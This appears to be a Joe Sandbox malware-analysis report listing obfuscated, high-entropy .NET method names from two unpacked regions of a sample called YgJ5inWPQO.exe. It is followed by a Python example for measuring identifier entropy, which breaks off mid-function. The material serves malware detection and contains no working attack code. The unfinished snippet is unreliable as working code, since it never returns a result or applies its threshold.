                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, 7l8EMvCZIQ2S6SCCgLjAUPV321xi9u2lG1TN5rcaiwq3jJZsmcdPp6QQZ4JfjN1Ag3iJhVbD2EMEm6iDuAiqQJORTJjKZlvtxR.csHigh entropy of concatenated method names: 'yLkA7Q6Kyqbf7JvABMuLJlGQe8lXA3ZPaGTzSUgq5myXaKtbYNc1F1R2xNV3eEzAlxyWWPMje4ZJsYtZpjLrVxKSGiuKErxdsn', 'ay9gvxX2nAR4xs0fZMBlmfecS4kM3MYsQmE9WDNd22SUfcckNmdsM5odOJqICEhy0b09DJsHYNjHvYltdHpSlt54GW6CuF8WAB', '_5YcIPTAaHluO4yNnj1vfBwQeeNmkoH8nMKzc2miNJESRx3WzOFaUm6KbQZxYDPbWr6QC3mZ817QCFOLaIzodRe6n9dZY62II0e', 'iM7MRft4gonQkd1M5Ag3RkMRz', 'HtI7DCm94hvxdFS3tcCRfjP0B', '_1eROfC4OTQkqiqLLg1UaTC7I3', '_86uYvfHoynkvtwP3LC7jNqL5l', '_6H35GECqxSX36OMFsHk9b0JI3', 'ivyvL9KeLSbyFYPNQl8bu5OCL', 'f6NSBWBAVbEsBxXbShNY8sAKQ'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, 0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.csHigh entropy of concatenated method names: 'yh97aflW3Y6Oc6EMOjb8igXrFuDjxnyJ0g4ZgemCPK25C6B0QkVCKz6gXmErE8EFiJzZ0N8KwuSddeiSIei', 'rmFFrLm9tg4sqGbwwV6wTFNfANZqh2jmSbI2T7KIFdXYBS7NZ76YUuWieUDCGxfu2uFIFSqI7qJbnil5WPx', 'JeYM41efdgM3xEeo83K8abrLd3xT9Zka5PUghZeANQraQFGzVzGwZlLjFHekTIjUpXPGUzOHAaa2hss6Ro7', 'jl27VKGuPbY6Vv50dLRBg9PHurocMlRz5UXO3avvvO7g7hGGaRW2xiPqgqgoCagbW6eFOJmnmTsQ9BFvKki'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, Aa9DO6wWMfkvbFA2SI9y58lSPZNgXOk0nlHGYdR5geCe6PSZ.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rCym4pGH0HfiWYMDkatZ4jDgtzxGrNwDeTdN4AGeR6ampuEWA1uJoNCe2HQqeMQKzjbNL0umb0ads4lHF7iR7rf0fDHQ6fYZv0', 'JnGcaPLk9cEe8ZtNdeKwV2NmbQK9NjtMQBcABUh7rA69kc63UMML6mEBixCWcCQlpNcgcRT7vTtcN98dMooYPV7JU7l3n98uBC', 'za8iXzabtj3LOTES9ZUroK4B7VbEXqHLFSddlabg9rmqfzeJxAwwU5fprAWHSYoqtTdLDLf5wWhhI3vRLVOpCx10SD7ZtcrfHV', 'AxG7nVOUs64ifgghu403q6JlFTkHiMAxg7JlRR7C6BUFS8ABLZGfAPgje1VNGD0I4tt1OhX6t7jmBvnVXZc'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csHigh entropy of concatenated method names: 'QxFWgAZfropbgmTO2hlzNsLzVeiewHGUSf6EW3Ffo7mQohnn3sFEtKyn58ywLDXZp', 'E7gTS6aZOBUjrnjWkRovirs5GQMP6vDANNiXNCsHM9XKpdpCSi9ySH4h7LWHV17ED', '_5GEPL5zXkhE1GjOHoZ9z63pfIV85JvFLlvj9gixiODSRnurpPHLDzOHVFbEEno2RavWF3fIZEn3SxJ98u2njqTFUddgst4LRcj', 'ltLJ4u6QrOFoSub4MAJVSYuaDhMwbXPSGDBGMy2ZbRxsYrLl16uPhdnTP7agf6Hm1vk8YnSCaVCsMp7KpjatND9rWTQO8huXyA', '_11e6MCzhNjt9fkdjoEPblcMuf6aFCMPVhhBUVA7Yqvey60iT4Z9rQiGfXtUSY21UXDoLmcm6FQzqjjhT443rzH1lHfGBRaJtHO', 'UZ4u6YhLiNmOQFhZub8hA81xnXuvc2Ctomxn0gpupTthP7ZmB0HUwan956IvJfW7zg9wrIOHlikLJ3FTJAQFthekemjXyhQSnf', 'DwGMdcgm3qHTRgmWo7sPJ5n0mnmEW2Fbc5oKL6LmvH2Z8Na3KvToLZPvhJoAOw3kTLi0O0Ocuxf3rowAAP7q2aqOBC16LpYOTX', 'zgdeUfZxN9ppsoOeFNMwd0uvrXzumzUexYDqje8VufRmYDVO4UqBdeQkKXZkwRFlpgusfVbxqelmm0C6pEM5PlxKogt9n60CKN', 'vmcqjfch5uiAiPz2xYdQXmk3uqbYmRKT6dK6XpFJuqu89T7ov0Xj6xsWrH2HieBkeuyBpMScrGzeRWxPDV4NyMWMaDCOXmtZWS', 'psQx6sOJNixtwH4cosuDJVM8w3hj7T7nEmPV7UZ3P0QeICadwisrC4VZPDfXPAwqXopYgZttuwQpzBkWaQ9QBphkKlg1T2YCYC'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, 0z3ZIhpJfhq2njFq0TTjg8sopVsEWVPb24mSwU4g0QL4dxjF7JdE4QOgJ40VPuiaU.csHigh entropy of concatenated method names: 'E7pAEoTZL9Spl2tY5dP9it8wxhZikXrxarMTkvT3bAO1JmNjM4DEjCrAFEf4C84Hc', 'sK1EMIEWy94QUVp8dt4NMb7nE', 'Bq3KY2TNlgepk2nYwWvgaeox4', 'ZATUsFwMG4tcqp3gKEA66w1O0', 'gqFJHjU2OILeYa5BRaqNA1D5k'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, RCU77fvzQI1bW3Vpo5QsIuEOnvacINkd41Sdukon4zQhdO3pwSwv0DKGBQDlkhLcC.csHigh entropy of concatenated method names: '_3S6hTXFysXlTNpxkpMjvWho3Xij3a1thIBgoyfGVtVa8vLSxdMJ4mTU9fHTeTpyaT', 'SH8BPXlVdqfTpfr0dXzAedp0Owyt8vQ5aQMzLkLDknEZIyP3wSWkTb4T9OOH6Rmwt', 'ujmHtkgyBcc340ZUYJd4ZwSHR9s75HBDcR02joVkumogehguuKmJcNwp2ARZ7Y2eU', '_8uLtrjXyCbOf5PZIQ3NOJ4dW6qSMOwuWamF2lDNy5dLn7CpRI4gwrgv5yrFxfx0cG', 'WNpZKzxqLOd7RnJuNXtrbOscx', 'j0O4pInvmClZbk6eGgGhDPkt1', '_27UGHbqGtAnPYozHgin2IxY2o', 'mP1PQHbMcqYgF7rcX92WxSnc7', 'UuSZA9yx6NwCF7bdQBlSE92eY', 'gV9BDwFy83190WOT9KtIpLVbQ'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.csHigh entropy of concatenated method names: 'lV8yfxnNOUZBrm7CCVAOCkMBat7ri85PfdsuSOkvPZ6T1pNFM5pGl9OqquNozdUuZRnBAVVMyRaaAMEB', 'Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c', 'pMFZ3PfvjSoGzkxKDTIiEVsgD2oSzxmwy9iQcZIMjWaqwi23XuiTTKhoEu57SkzeNCkbcY2b8FxO5Mvv', 'NH7YFiUOc5O0NSPvuPKD60ETIJxA3xnxfVXgRvMOuDvL2ZGrLviNQ6KOb50AX6b8G4oMPQm6QcuJNFxc', 'XqsUtRgXgobAukbBF3YrZRWuvN7k9mQQ4UTQuwGRKzndvPcxpUcoFtGYOFhERsAzBV0sYIi73FysSCpP', 'ehmlzl9HRbOhC72a5QblVNPKttoeTJGt58GLWCcJwFc9tIA8JMLTR7cC8fo2z59e5Elbdoq3HBIm3JBF', 'cVa88cKP4KxJbWe1wHxvup0fb40DrVPdG6MU4DVPRDtMslX2XHJVQLch5LdVStxVr0K7OWr7ZAvma7g0', '_6n7p7xcfkpxVJHGWtOAgEauvhKq6iFar1EAuBxNmilpE0I6s4OTNZGJI6olsxtYtouxQOyuB1NLvYxsM', 'gdyqhq6UGMGDaSA4E3FKviLXlri68bwhigKwBd09U3mJhDdd8EFiyXjYk7v0Me4p6', 'qBmNnXvTbBv0CeX2VcO6Mx2b2hi1FMYkpC0aLANmj0fjIVVdNBTGzIXF4qZZQC6is'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csHigh entropy of concatenated method names: 'qdmDYl4SL5ToIVCygypSkfUIDKPjPBMcg2pWQW1zo5JM2XOuiAwYIwNyAwohiYTUHH7uBG2P6URZDpkm', 'pQuIZJe9VwWfwtXo1n1TM12UVqpO1F6n1SDK5IiQTd5al1uh8JfEfTNYDwRfQPZij33wLq0aUK20cOHm', 'yealjVgbGthaP5FKECWl8KU5CL3QtF9urObvSWHJpwUX0AVS2QILSBuOrVLFBBCV02Wd64qHl5rcj8jj', 'FxMirkENPExtEC31ZL6aSwVo77wVgbeSUnd6fAw4oyPrAkel0j9O2ZgTZqqMSqieMfewjincpK0Vnsyz', 'RvVB9Ejb26XJ1kquvFnq3aQ9DI4Clt6AkQ55Vb1JVjaKGicDYngQj48Lgk5uza6TrlBilvpG9rZbdpZr', 'ojqT7jfklN6efpZt4f9GOK8UlLQQYSyLsWsqLdh7pNleULztIfmvuRjvbiUL5hBghcJHTVixu9AvWaSB', 'LYESWLPlNRB0RjlPBmu0cNDGD3nxTEfomN5rdXs2kjJkJ0rChKYf9a5OY3zH2ws4i2hdhKGIxYwUhAxv', 'sPApCcjEzgyiG1RLXBGyRbJDlQhSTnsCE8FYdrOIqFff4GpLFG35DTBjOoiBOIyRJbopCIzMXppXzf9z', '_4UeQiiQhn5nUGmsfOBWU2l6MQmAdJGc1zZCtsJ3WEBsztv7nnRLNlASY3wLrXt4So1oMMqbwc4Bs5g9l', '_9x2NFSoKL9vLpyXL1ktRXKL7SG847SNgRcdPtdPR8Om2cVboTqKHs6XMueB4gqshuhF7Aia8hNhQel9u'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, kYTFTR8V1K5OKHLJMdR9YLHeADSXXhtlG4Iwp3C4PI51lKEwaKDsnQlE3p7TC5FakkF3rYArzaBF5kPl.csHigh entropy of concatenated method names: 'BVqUoib0qQQlOkJEpWqM9D6mhr8SUDEpFDtzydSqh2w5Oo3DHVMV9mx7q1h0P8J55Ykz6w58o4H7LEC7', 'c31mxOeqgNLubMT2h5AST0IHdPAgEFgZAXyQ8RyaqvvyD0m6iwyKnYPQgsEHgKq4sclbIoCq9ekKmJx5', 'PzZFwBQ0Wo3sWYN9lbVpUjs00MTFAMgL3C6c1M62OH6qp0HyaCykdkRtcktS1lpPGIadK151yf9ll5kP', 'iZ1VpmKAxUZ5MEy03TNnL0O13IynehkTVOmUnOQihopeuYCgPofGAcz3cEjJz62CyozF9AxaBx6FYwVJ', 'k3ndOXrYkQH9liWl9ILv5rTWikaKMUactCNvyGmIoxN6HqIFj24TozibWBtvio1FK5CL9GyeJ8COXdao', 'h4Jxq053KZd14zLY6MGQRcCVHWhC1oUNZ1Dwkh06DyfCoK8BZ41STUKuTNZaIiyOtRLDSnWeyxeuHyx5', 'yE0qpSUDJwJzUcoWRb7RduQfTW8VbkCDON7wafJczZbOxyFxEsahclUEguvWpBZvySnlLbAFbOAaG43o', '_3eZb4qgo9XlZFyEEP6kniOLHeIGoVAwPpp0QNW1Oz6Rdmg32BWCa24cRVDPSwcscPU0AQeTeSoGdorXY', 'VzfEhaqpx7WuM6mKRysSvH9CnwJfaQgLrwFjSXr7Dd8MvmhLq5ucsvUZNIRSyYcbUor0nwBAb5adVWJA', 'Hcxmwgcfvb0Bkd2qCZPrYJ9y8zsB3wzwWROBql1Bs7u2bWnTbpVOqKraOWNdG3emjOJzdqAZG19OKmsU'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, qbP50VaV6GXcwq1MYN7LflNfjGaY1EnTdTMXqhGBe7CwlDFU5DK42dCawqRAoJLP4.csHigh entropy of concatenated method names: 'MXhGTmv46wi5UhuMKLIxDlmzGyV7SGmjknEIYL3cd38rdGgJN0f51QgP9wyn2zklK', 'PsuVaX6vi2YxK2FN82eAyoFLnBPEC3myeciUVh0g4hxrd5hBvKdW4tmkIJfc2rPF5', 'axoHHeKaC9uJqM3UUsG2vc0waW0Pkc4HfWmp7YncVCNKZlNWZoD6sZmdUDCkQ7Le4', 'EqQrwwEuNxMagdr276yhN8uCG2fZ2Im63WLnYY3Xjk8ALtrmRJFaK7urDnQ7U3oZx', 'WhPVdwGxGiASUSwCNVscZFrPhIPtxFVwgmuL3zSkXK90LEZpKgEUSQNukdpXV06tW', 'rrent0ANdMIraUHV8crovUBgoM9R8aVTgf2hwKfWPyItgZlhS0Ah5nmfDHHRbX9nA', 'FtaDGUbc726CncyTgQdVlNgqZTQNlinN5JIKCGsk1QXh1L61c1lGE9lTJBwcMU34z', 'qyQ13OJEfnw6cNJa4AWK3KJFjrbCGz1q7TiPiSrh7sOKMUkQhjQsNCwouKtHvdFzS', '_6c2pg3Gt4EzzUEfWShMSZcLD90vIQcf1K4tDIIFlrYiowtiJaBUYTEn0POAeyxBxL', 'I45LXYxaZ72Yz8T3SQepzItv8kDPDO4byqIBOub6l5OhFWxq5sX0MrBiZzttKiHfT'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, 7l8EMvCZIQ2S6SCCgLjAUPV321xi9u2lG1TN5rcaiwq3jJZsmcdPp6QQZ4JfjN1Ag3iJhVbD2EMEm6iDuAiqQJORTJjKZlvtxR.csHigh entropy of concatenated method names: 'yLkA7Q6Kyqbf7JvABMuLJlGQe8lXA3ZPaGTzSUgq5myXaKtbYNc1F1R2xNV3eEzAlxyWWPMje4ZJsYtZpjLrVxKSGiuKErxdsn', 'ay9gvxX2nAR4xs0fZMBlmfecS4kM3MYsQmE9WDNd22SUfcckNmdsM5odOJqICEhy0b09DJsHYNjHvYltdHpSlt54GW6CuF8WAB', '_5YcIPTAaHluO4yNnj1vfBwQeeNmkoH8nMKzc2miNJESRx3WzOFaUm6KbQZxYDPbWr6QC3mZ817QCFOLaIzodRe6n9dZY62II0e', 'iM7MRft4gonQkd1M5Ag3RkMRz', 'HtI7DCm94hvxdFS3tcCRfjP0B', '_1eROfC4OTQkqiqLLg1UaTC7I3', '_86uYvfHoynkvtwP3LC7jNqL5l', '_6H35GECqxSX36OMFsHk9b0JI3', 'ivyvL9KeLSbyFYPNQl8bu5OCL', 'f6NSBWBAVbEsBxXbShNY8sAKQ'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, 0fMQz1adjSFKPgcLs2KfNWsL1qDjoRJ254KgG47NkBGFlkHX.csHigh entropy of concatenated method names: 'yh97aflW3Y6Oc6EMOjb8igXrFuDjxnyJ0g4ZgemCPK25C6B0QkVCKz6gXmErE8EFiJzZ0N8KwuSddeiSIei', 'rmFFrLm9tg4sqGbwwV6wTFNfANZqh2jmSbI2T7KIFdXYBS7NZ76YUuWieUDCGxfu2uFIFSqI7qJbnil5WPx', 'JeYM41efdgM3xEeo83K8abrLd3xT9Zka5PUghZeANQraQFGzVzGwZlLjFHekTIjUpXPGUzOHAaa2hss6Ro7', 'jl27VKGuPbY6Vv50dLRBg9PHurocMlRz5UXO3avvvO7g7hGGaRW2xiPqgqgoCagbW6eFOJmnmTsQ9BFvKki'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, Aa9DO6wWMfkvbFA2SI9y58lSPZNgXOk0nlHGYdR5geCe6PSZ.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rCym4pGH0HfiWYMDkatZ4jDgtzxGrNwDeTdN4AGeR6ampuEWA1uJoNCe2HQqeMQKzjbNL0umb0ads4lHF7iR7rf0fDHQ6fYZv0', 'JnGcaPLk9cEe8ZtNdeKwV2NmbQK9NjtMQBcABUh7rA69kc63UMML6mEBixCWcCQlpNcgcRT7vTtcN98dMooYPV7JU7l3n98uBC', 'za8iXzabtj3LOTES9ZUroK4B7VbEXqHLFSddlabg9rmqfzeJxAwwU5fprAWHSYoqtTdLDLf5wWhhI3vRLVOpCx10SD7ZtcrfHV', 'AxG7nVOUs64ifgghu403q6JlFTkHiMAxg7JlRR7C6BUFS8ABLZGfAPgje1VNGD0I4tt1OhX6t7jmBvnVXZc'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csHigh entropy of concatenated method names: 'QxFWgAZfropbgmTO2hlzNsLzVeiewHGUSf6EW3Ffo7mQohnn3sFEtKyn58ywLDXZp', 'E7gTS6aZOBUjrnjWkRovirs5GQMP6vDANNiXNCsHM9XKpdpCSi9ySH4h7LWHV17ED', '_5GEPL5zXkhE1GjOHoZ9z63pfIV85JvFLlvj9gixiODSRnurpPHLDzOHVFbEEno2RavWF3fIZEn3SxJ98u2njqTFUddgst4LRcj', 'ltLJ4u6QrOFoSub4MAJVSYuaDhMwbXPSGDBGMy2ZbRxsYrLl16uPhdnTP7agf6Hm1vk8YnSCaVCsMp7KpjatND9rWTQO8huXyA', '_11e6MCzhNjt9fkdjoEPblcMuf6aFCMPVhhBUVA7Yqvey60iT4Z9rQiGfXtUSY21UXDoLmcm6FQzqjjhT443rzH1lHfGBRaJtHO', 'UZ4u6YhLiNmOQFhZub8hA81xnXuvc2Ctomxn0gpupTthP7ZmB0HUwan956IvJfW7zg9wrIOHlikLJ3FTJAQFthekemjXyhQSnf', 'DwGMdcgm3qHTRgmWo7sPJ5n0mnmEW2Fbc5oKL6LmvH2Z8Na3KvToLZPvhJoAOw3kTLi0O0Ocuxf3rowAAP7q2aqOBC16LpYOTX', 'zgdeUfZxN9ppsoOeFNMwd0uvrXzumzUexYDqje8VufRmYDVO4UqBdeQkKXZkwRFlpgusfVbxqelmm0C6pEM5PlxKogt9n60CKN', 'vmcqjfch5uiAiPz2xYdQXmk3uqbYmRKT6dK6XpFJuqu89T7ov0Xj6xsWrH2HieBkeuyBpMScrGzeRWxPDV4NyMWMaDCOXmtZWS', 'psQx6sOJNixtwH4cosuDJVM8w3hj7T7nEmPV7UZ3P0QeICadwisrC4VZPDfXPAwqXopYgZttuwQpzBkWaQ9QBphkKlg1T2YCYC'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, 0z3ZIhpJfhq2njFq0TTjg8sopVsEWVPb24mSwU4g0QL4dxjF7JdE4QOgJ40VPuiaU.csHigh entropy of concatenated method names: 'E7pAEoTZL9Spl2tY5dP9it8wxhZikXrxarMTkvT3bAO1JmNjM4DEjCrAFEf4C84Hc', 'sK1EMIEWy94QUVp8dt4NMb7nE', 'Bq3KY2TNlgepk2nYwWvgaeox4', 'ZATUsFwMG4tcqp3gKEA66w1O0', 'gqFJHjU2OILeYa5BRaqNA1D5k'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, RCU77fvzQI1bW3Vpo5QsIuEOnvacINkd41Sdukon4zQhdO3pwSwv0DKGBQDlkhLcC.csHigh entropy of concatenated method names: '_3S6hTXFysXlTNpxkpMjvWho3Xij3a1thIBgoyfGVtVa8vLSxdMJ4mTU9fHTeTpyaT', 'SH8BPXlVdqfTpfr0dXzAedp0Owyt8vQ5aQMzLkLDknEZIyP3wSWkTb4T9OOH6Rmwt', 'ujmHtkgyBcc340ZUYJd4ZwSHR9s75HBDcR02joVkumogehguuKmJcNwp2ARZ7Y2eU', '_8uLtrjXyCbOf5PZIQ3NOJ4dW6qSMOwuWamF2lDNy5dLn7CpRI4gwrgv5yrFxfx0cG', 'WNpZKzxqLOd7RnJuNXtrbOscx', 'j0O4pInvmClZbk6eGgGhDPkt1', '_27UGHbqGtAnPYozHgin2IxY2o', 'mP1PQHbMcqYgF7rcX92WxSnc7', 'UuSZA9yx6NwCF7bdQBlSE92eY', 'gV9BDwFy83190WOT9KtIpLVbQ'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, VtuFYKkWuY1PI9BLhv1ksGbAvUhLDZmtE93hWySfiP39HcMYveO0HxCdT6CIPx7oMr8o8LBMU51eJGML.csHigh entropy of concatenated method names: 'lV8yfxnNOUZBrm7CCVAOCkMBat7ri85PfdsuSOkvPZ6T1pNFM5pGl9OqquNozdUuZRnBAVVMyRaaAMEB', 'Mgz8VMYXFJgs3CCMy91hlPEh2gWvWXttoNd8pG4xN08KTUwmb3zGeU0ET6YRZMvLwvIqXmPQHoooDm0c', 'pMFZ3PfvjSoGzkxKDTIiEVsgD2oSzxmwy9iQcZIMjWaqwi23XuiTTKhoEu57SkzeNCkbcY2b8FxO5Mvv', 'NH7YFiUOc5O0NSPvuPKD60ETIJxA3xnxfVXgRvMOuDvL2ZGrLviNQ6KOb50AX6b8G4oMPQm6QcuJNFxc', 'XqsUtRgXgobAukbBF3YrZRWuvN7k9mQQ4UTQuwGRKzndvPcxpUcoFtGYOFhERsAzBV0sYIi73FysSCpP', 'ehmlzl9HRbOhC72a5QblVNPKttoeTJGt58GLWCcJwFc9tIA8JMLTR7cC8fo2z59e5Elbdoq3HBIm3JBF', 'cVa88cKP4KxJbWe1wHxvup0fb40DrVPdG6MU4DVPRDtMslX2XHJVQLch5LdVStxVr0K7OWr7ZAvma7g0', '_6n7p7xcfkpxVJHGWtOAgEauvhKq6iFar1EAuBxNmilpE0I6s4OTNZGJI6olsxtYtouxQOyuB1NLvYxsM', 'gdyqhq6UGMGDaSA4E3FKviLXlri68bwhigKwBd09U3mJhDdd8EFiyXjYk7v0Me4p6', 'qBmNnXvTbBv0CeX2VcO6Mx2b2hi1FMYkpC0aLANmj0fjIVVdNBTGzIXF4qZZQC6is'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csHigh entropy of concatenated method names: 'qdmDYl4SL5ToIVCygypSkfUIDKPjPBMcg2pWQW1zo5JM2XOuiAwYIwNyAwohiYTUHH7uBG2P6URZDpkm', 'pQuIZJe9VwWfwtXo1n1TM12UVqpO1F6n1SDK5IiQTd5al1uh8JfEfTNYDwRfQPZij33wLq0aUK20cOHm', 'yealjVgbGthaP5FKECWl8KU5CL3QtF9urObvSWHJpwUX0AVS2QILSBuOrVLFBBCV02Wd64qHl5rcj8jj', 'FxMirkENPExtEC31ZL6aSwVo77wVgbeSUnd6fAw4oyPrAkel0j9O2ZgTZqqMSqieMfewjincpK0Vnsyz', 'RvVB9Ejb26XJ1kquvFnq3aQ9DI4Clt6AkQ55Vb1JVjaKGicDYngQj48Lgk5uza6TrlBilvpG9rZbdpZr', 'ojqT7jfklN6efpZt4f9GOK8UlLQQYSyLsWsqLdh7pNleULztIfmvuRjvbiUL5hBghcJHTVixu9AvWaSB', 'LYESWLPlNRB0RjlPBmu0cNDGD3nxTEfomN5rdXs2kjJkJ0rChKYf9a5OY3zH2ws4i2hdhKGIxYwUhAxv', 'sPApCcjEzgyiG1RLXBGyRbJDlQhSTnsCE8FYdrOIqFff4GpLFG35DTBjOoiBOIyRJbopCIzMXppXzf9z', '_4UeQiiQhn5nUGmsfOBWU2l6MQmAdJGc1zZCtsJ3WEBsztv7nnRLNlASY3wLrXt4So1oMMqbwc4Bs5g9l', '_9x2NFSoKL9vLpyXL1ktRXKL7SG847SNgRcdPtdPR8Om2cVboTqKHs6XMueB4gqshuhF7Aia8hNhQel9u'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, kYTFTR8V1K5OKHLJMdR9YLHeADSXXhtlG4Iwp3C4PI51lKEwaKDsnQlE3p7TC5FakkF3rYArzaBF5kPl.csHigh entropy of concatenated method names: 'BVqUoib0qQQlOkJEpWqM9D6mhr8SUDEpFDtzydSqh2w5Oo3DHVMV9mx7q1h0P8J55Ykz6w58o4H7LEC7', 'c31mxOeqgNLubMT2h5AST0IHdPAgEFgZAXyQ8RyaqvvyD0m6iwyKnYPQgsEHgKq4sclbIoCq9ekKmJx5', 'PzZFwBQ0Wo3sWYN9lbVpUjs00MTFAMgL3C6c1M62OH6qp0HyaCykdkRtcktS1lpPGIadK151yf9ll5kP', 'iZ1VpmKAxUZ5MEy03TNnL0O13IynehkTVOmUnOQihopeuYCgPofGAcz3cEjJz62CyozF9AxaBx6FYwVJ', 'k3ndOXrYkQH9liWl9ILv5rTWikaKMUactCNvyGmIoxN6HqIFj24TozibWBtvio1FK5CL9GyeJ8COXdao', 'h4Jxq053KZd14zLY6MGQRcCVHWhC1oUNZ1Dwkh06DyfCoK8BZ41STUKuTNZaIiyOtRLDSnWeyxeuHyx5', 'yE0qpSUDJwJzUcoWRb7RduQfTW8VbkCDON7wafJczZbOxyFxEsahclUEguvWpBZvySnlLbAFbOAaG43o', '_3eZb4qgo9XlZFyEEP6kniOLHeIGoVAwPpp0QNW1Oz6Rdmg32BWCa24cRVDPSwcscPU0AQeTeSoGdorXY', 'VzfEhaqpx7WuM6mKRysSvH9CnwJfaQgLrwFjSXr7Dd8MvmhLq5ucsvUZNIRSyYcbUor0nwBAb5adVWJA', 'Hcxmwgcfvb0Bkd2qCZPrYJ9y8zsB3wzwWROBql1Bs7u2bWnTbpVOqKraOWNdG3emjOJzdqAZG19OKmsU'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, qbP50VaV6GXcwq1MYN7LflNfjGaY1EnTdTMXqhGBe7CwlDFU5DK42dCawqRAoJLP4.csHigh entropy of concatenated method names: 'MXhGTmv46wi5UhuMKLIxDlmzGyV7SGmjknEIYL3cd38rdGgJN0f51QgP9wyn2zklK', 'PsuVaX6vi2YxK2FN82eAyoFLnBPEC3myeciUVh0g4hxrd5hBvKdW4tmkIJfc2rPF5', 'axoHHeKaC9uJqM3UUsG2vc0waW0Pkc4HfWmp7YncVCNKZlNWZoD6sZmdUDCkQ7Le4', 'EqQrwwEuNxMagdr276yhN8uCG2fZ2Im63WLnYY3Xjk8ALtrmRJFaK7urDnQ7U3oZx', 'WhPVdwGxGiASUSwCNVscZFrPhIPtxFVwgmuL3zSkXK90LEZpKgEUSQNukdpXV06tW', 'rrent0ANdMIraUHV8crovUBgoM9R8aVTgf2hwKfWPyItgZlhS0Ah5nmfDHHRbX9nA', 'FtaDGUbc726CncyTgQdVlNgqZTQNlinN5JIKCGsk1QXh1L61c1lGE9lTJBwcMU34z', 'qyQ13OJEfnw6cNJa4AWK3KJFjrbCGz1q7TiPiSrh7sOKMUkQhjQsNCwouKtHvdFzS', '_6c2pg3Gt4EzzUEfWShMSZcLD90vIQcf1K4tDIIFlrYiowtiJaBUYTEn0POAeyxBxL', 'I45LXYxaZ72Yz8T3SQepzItv8kDPDO4byqIBOub6l5OhFWxq5sX0MrBiZzttKiHfT'
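The "High entropy of concatenated method names" items above come from a static heuristic: the decompiled method names of each type are joined and their character-level Shannon entropy is measured, because obfuscator-renamed identifiers are close to uniform over [A-Za-z0-9] while real method names are English-like. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own implementation; the threshold (5.0 bits per character), the minimum length (64 characters) and the NORMAL_METHODS baseline are assumptions for illustration. The obfuscated list is copied from the report's finding for the class beginning 7l8EMvCZ in 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack.

```python
import math
import re
from collections import Counter

# Method names copied verbatim from the report's finding for the class
# 7l8EMvCZ...AiqQJORTJjKZlvtxR.cs in 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack.
OBFUSCATED_METHODS = [
    "yLkA7Q6Kyqbf7JvABMuLJlGQe8lXA3ZPaGTzSUgq5myXaKtbYNc1F1R2xNV3eEzAlxyWWPMje4ZJsYtZpjLrVxKSGiuKErxdsn",
    "ay9gvxX2nAR4xs0fZMBlmfecS4kM3MYsQmE9WDNd22SUfcckNmdsM5odOJqICEhy0b09DJsHYNjHvYltdHpSlt54GW6CuF8WAB",
    "_5YcIPTAaHluO4yNnj1vfBwQeeNmkoH8nMKzc2miNJESRx3WzOFaUm6KbQZxYDPbWr6QC3mZ817QCFOLaIzodRe6n9dZY62II0e",
    "iM7MRft4gonQkd1M5Ag3RkMRz",
    "HtI7DCm94hvxdFS3tcCRfjP0B",
    "_1eROfC4OTQkqiqLLg1UaTC7I3",
    "_86uYvfHoynkvtwP3LC7jNqL5l",
    "_6H35GECqxSX36OMFsHk9b0JI3",
    "ivyvL9KeLSbyFYPNQl8bu5OCL",
    "f6NSBWBAVbEsBxXbShNY8sAKQ",
]

# Constructed baseline of ordinary .NET method names; the first four also appear
# verbatim in the report's finding for the class beginning Aa9DO6wW.
NORMAL_METHODS = ["Equals", "GetHashCode", "GetType", "ToString",
                  "Dispose", "ReadAllBytes", "Connect", "SendAsync"]

_QUOTED = re.compile(r"'([^']*)'")


def shannon_entropy(text: str) -> float:
    """Empirical Shannon entropy of text in bits per character (0.0 for empty input)."""
    if not text:
        return 0.0
    n = len(text)
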